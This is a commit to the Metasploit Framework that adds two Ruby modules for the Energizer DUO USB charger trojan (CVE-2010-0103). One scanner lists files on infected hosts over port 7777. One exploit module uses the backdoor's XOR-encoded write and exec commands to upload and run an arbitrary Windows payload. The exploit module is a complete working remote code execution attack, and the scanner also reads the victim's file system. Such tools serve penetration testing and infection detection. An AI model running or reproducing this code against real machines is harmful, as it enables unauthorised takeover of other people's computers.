Adds detection and exploitation coverage for the Energizer Duo trojan

git-svn-id: file:///home/svn/framework3/trunk@8749 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb

@@ -0,0 +1,115 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'Energizer DUO Trojan Scanner',
+			'Version'     => '$Revision$',
+			'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777',
+			'Author'      => 'hdm',
+			'References'  =>
+				[
+					['CVE', '2010-0103'],
+					['URL', 'http://www.kb.cert.org/vuls/id/154421']
+				],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				Opt::RPORT(7777),
+			], self.class)
+	end
+
+	def trojan_encode(str)
+		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
+	end
+
+	def trojan_command(cmd)
+		cid = ""
+
+		case cmd
+		when :exec
+			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
+		when :dir
+			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
+		when :write
+			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
+		when :read
+			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
+		when :nop
+			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
+		when :find
+			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
+		when :yes
+			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
+		when :runonce
+			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
+		when :delete
+			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
+		end
+
+		trojan_encode(
+			[0x27].pack("V") + cid  + "\x00"
+		)
+	end
+
+	def run_host(ip)
+
+		begin
+
+		connect
+		sock.put(trojan_command(:dir))
+		sock.put(
+			trojan_encode(
+				[4].pack("V") + "C:\\\x00\x00"
+			)
+		)
+
+		lbuff = sock.get_once(4, 5)
+		if(not lbuff)
+			print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")
+			disconnect
+			return
+		end
+
+		len   = trojan_encode(lbuff).unpack("V")[0]
+		dbuff = sock.get_once(len, 30)
+		data  = trojan_encode(dbuff)
+		files = data.split("|").map do |x|
+			if x[0,2] == "?1"
+				["D", x[2,x.length-2]]
+			else
+				["F", x]
+			end
+		end
+
+		# Required to prevent the server from spinning a loop
+		sock.put(trojan_command(:nop))
+
+		print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
+
+		disconnect
+
+		rescue ::Interrupt
+			raise $!
+		rescue ::Rex::ConnectionError, ::IOError
+		end
+
+	end
+end
+

modules/exploits/windows/backdoor/energizer_duo_payload.rb

@@ -0,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Energizer DUO Trojan Code Execution',
+			'Description'    => %q{
+				This module will execute an arbitrary payload against
+			any system infected with the Arugizer trojan horse. This
+			backdoor was shipped with the software package accompanying
+			the Energizer Duo USB battery charger.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['CVE', '2010-0103'],
+					['URL', 'http://www.kb.cert.org/vuls/id/154421']
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0
+			))
+
+
+		register_options(
+			[
+				Opt::RPORT(7777),
+			], self.class)
+	end
+
+	def trojan_encode(str)
+		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
+	end
+
+	def trojan_command(cmd)
+		cid = ""
+
+		case cmd
+		when :exec
+			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
+		when :dir
+			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
+		when :write
+			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
+		when :read
+			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
+		when :nop
+			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
+		when :find
+			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
+		when :yes
+			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
+		when :runonce
+			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
+		when :delete
+			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
+		end
+
+		trojan_encode(
+			[cid.length + 1].pack("V") + cid  + "\x00"
+		)
+	end
+
+	def exploit
+
+		nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
+		exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"
+
+
+		print_status("Trying to upload #{nam}...")
+		connect
+
+		# Write file request
+		sock.put(trojan_command(:write))
+		sock.put(trojan_encode([nam.length].pack("V")))
+		sock.put(trojan_encode(nam))
+		sock.put(trojan_encode([exe.length].pack("V")))
+		sock.put(trojan_encode(exe))
+
+		# Required to prevent the server from spinning a loop
+		sock.put(trojan_command(:nop))
+
+		disconnect
+
+		#
+		# Execute the payload
+		#
+
+		print_status("Trying to execute #{nam}...")
+
+		connect
+
+		# Execute file request
+		sock.put(trojan_command(:exec))
+		sock.put(trojan_encode([nam.length].pack("V")))
+		sock.put(trojan_encode(nam))
+
+		# Required to prevent the server from spinning a loop
+		sock.put(trojan_command(:nop))
+
+		disconnect
+	end
+end
+